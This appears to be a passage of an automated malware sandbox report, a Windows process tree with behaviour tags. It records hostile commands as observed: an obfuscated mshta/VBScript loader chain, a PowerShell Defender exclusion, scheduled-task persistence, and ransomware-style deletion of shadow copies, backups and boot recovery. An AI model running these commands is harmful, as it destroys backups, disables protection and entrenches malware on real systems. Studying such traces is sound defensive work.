C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 17652 -s 284⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5300 -s 284⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
-
C:\Users\Admin\Documents\i9Ug0Yhw5wIgttQylm6TglZd.exe"C:\Users\Admin\Documents\i9Ug0Yhw5wIgttQylm6TglZd.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\i9Ug0Yhw5wIgttQylm6TglZd.exe"C:\Users\Admin\Documents\i9Ug0Yhw5wIgttQylm6TglZd.exe"3⤵
-
-
-
C:\Users\Admin\Documents\fwJPGcKeapxGI5TMIlFg4jU2.exe"C:\Users\Admin\Documents\fwJPGcKeapxGI5TMIlFg4jU2.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCripT: CloSe ( CReateOBjecT ("wSCRipT.sheLl"). RUN ( "cmD /q /C TYPe ""C:\Users\Admin\Documents\fwJPGcKeapxGI5TMIlFg4jU2.exe"" > Bx0IuOFB.ExE && StArT BX0iUoFB.EXe -PyTJSIPDC12bsxp0f1 & iF """" == """" for %Q in ( ""C:\Users\Admin\Documents\fwJPGcKeapxGI5TMIlFg4jU2.exe"" ) do taskkill -F -im ""%~NxQ"" ", 0, truE) )3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /C TYPe "C:\Users\Admin\Documents\fwJPGcKeapxGI5TMIlFg4jU2.exe" >Bx0IuOFB.ExE && StArT BX0iUoFB.EXe -PyTJSIPDC12bsxp0f1 & iF "" == "" for %Q in ( "C:\Users\Admin\Documents\fwJPGcKeapxGI5TMIlFg4jU2.exe" ) do taskkill -F -im "%~NxQ"4⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\Bx0IuOFB.ExEBX0iUoFB.EXe -PyTJSIPDC12bsxp0f15⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCripT: CloSe ( CReateOBjecT ("wSCRipT.sheLl"). RUN ( "cmD /q /C TYPe ""C:\Users\Admin\AppData\Local\Temp\Bx0IuOFB.ExE"" > Bx0IuOFB.ExE && StArT BX0iUoFB.EXe -PyTJSIPDC12bsxp0f1 & iF ""-PyTJSIPDC12bsxp0f1 "" == """" for %Q in ( ""C:\Users\Admin\AppData\Local\Temp\Bx0IuOFB.ExE"" ) do taskkill -F -im ""%~NxQ"" ", 0, truE) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /C TYPe "C:\Users\Admin\AppData\Local\Temp\Bx0IuOFB.ExE" >Bx0IuOFB.ExE && StArT BX0iUoFB.EXe -PyTJSIPDC12bsxp0f1 & iF "-PyTJSIPDC12bsxp0f1 " == "" for %Q in ( "C:\Users\Admin\AppData\Local\Temp\Bx0IuOFB.ExE" ) do taskkill -F -im "%~NxQ"7⤵
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" .\BPJm7xC.Iwa,Rgac6⤵
- Loads dropped DLL
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -F -im "fwJPGcKeapxGI5TMIlFg4jU2.exe"5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
C:\Users\Admin\Documents\7eEWh0L0pAvqqP97gK6ntuOs.exe"C:\Users\Admin\Documents\7eEWh0L0pAvqqP97gK6ntuOs.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\wRjVMQ1PYxXtiVtgmNMf7BTO.exe"C:\Users\Admin\Documents\wRjVMQ1PYxXtiVtgmNMf7BTO.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3136 -s 2763⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\hPpyHuT7psBThm6HyOXDo1aV.exe"C:\Users\Admin\Documents\hPpyHuT7psBThm6HyOXDo1aV.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Documents\854WcJGsU9ff7sZQkeCXMgYJ.exe"C:\Users\Admin\Documents\854WcJGsU9ff7sZQkeCXMgYJ.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2996 -s 3163⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\IS_NZxa8lhsvv7R9sciRpeRY.exe"C:\Users\Admin\Documents\IS_NZxa8lhsvv7R9sciRpeRY.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\Documents\69RtbxtHnFhksAVvQdMnJQA2.exe"C:\Users\Admin\Documents\69RtbxtHnFhksAVvQdMnJQA2.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\yCOvp7UX24Wr6u_GM4KLa_3O.exe"C:\Users\Admin\Documents\yCOvp7UX24Wr6u_GM4KLa_3O.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\YCOVP7~1.DLL,s C:\Users\Admin\DOCUME~1\YCOVP7~1.EXE3⤵
- Blocklisted process makes network request
- Loads dropped DLL
-
C:\Windows\SysWOW64\RUNDLL32.EXEC:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\YCOVP7~1.DLL,b1YZclNJMzc=4⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Checks processor information in registry
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\YCOVP7~1.DLL5⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmp911D.tmp.ps1"5⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmp50A1.tmp.ps1"5⤵
-
C:\Windows\SysWOW64\nslookup.exe"C:\Windows\system32\nslookup.exe" -type=any localhost6⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /End /tn \Microsoft\Windows\Wininet\CacheTask5⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /tn \Microsoft\Windows\Wininet\CacheTask5⤵
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1104 -s 8404⤵
- Program crash
-
-
-
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv XR3JzXNqPUW7aknY8t7QJw.0.21⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2996 -ip 29961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 3136 -ip 31361⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 352 -p 3956 -ip 39561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 132 -s 4603⤵
- Program crash
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2536 -ip 25361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3400 -ip 34001⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 132 -ip 1321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 4636 -ip 46361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2580 -ip 25801⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 792 -ip 7921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 2196 -ip 21961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 6960 -ip 69601⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 6568 -ip 65681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4712 -ip 47121⤵
-
C:\Users\Admin\AppData\Local\Temp\BB58.exeC:\Users\Admin\AppData\Local\Temp\BB58.exe1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\CD99.exeC:\Users\Admin\AppData\Local\Temp\CD99.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1628 -s 2402⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
C:\Users\Admin\AppData\Local\Temp\302.exeC:\Users\Admin\AppData\Local\Temp\302.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5192 -s 2402⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
C:\Users\Admin\AppData\Local\Temp\5374.exeC:\Users\Admin\AppData\Local\Temp\5374.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 2442⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1104 -ip 11041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 6972 -ip 69721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\8505.exeC:\Users\Admin\AppData\Local\Temp\8505.exe1⤵
- Adds Run key to start application
- Enumerates connected drives
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe" -start2⤵
- Enumerates connected drives
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete3⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet3⤵
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe" -agent 03⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat3⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet3⤵
-
-
C:\Windows\SysWOW64\notepad.exenotepad.exe3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete2⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\8505.exe"C:\Users\Admin\AppData\Local\Temp\8505.exe" -agent 02⤵
- Drops file in Program Files directory
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat2⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet2⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet2⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures2⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\A3B9.exeC:\Users\Admin\AppData\Local\Temp\A3B9.exe1⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe"2⤵
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7740 -s 8762⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
